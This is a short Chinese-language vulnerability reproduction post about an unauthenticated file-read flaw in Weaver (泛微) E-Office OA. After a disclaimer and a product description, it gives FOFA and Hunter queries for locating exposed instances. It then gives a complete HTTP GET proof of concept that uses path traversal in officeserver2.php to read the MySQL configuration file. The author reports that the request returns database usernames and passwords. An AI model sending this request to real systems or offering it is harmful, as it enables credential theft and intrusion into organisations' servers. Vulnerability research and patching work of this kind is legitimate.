泛微E-Office前台文件读取漏洞复现

泛微E-Office前台文件读取漏洞复现

0x01 前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

0x02 漏洞描述

泛微E-Office是一款企业级的全流程办公自动化软件，它包括协同办公、文档管理、知识管理、工作流管理等多个模块，涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化，提高工作效率和管理质量，降低管理成本，为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

0x03 影响平台

泛微E-Office OA 

0x04 漏洞环境

FOFA语法： app=“泛微-EOffice”

hunter语法： app.name=“泛微 e-office OA”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

3.复现

成功响应，获取到数据库用户名和密码 ！！！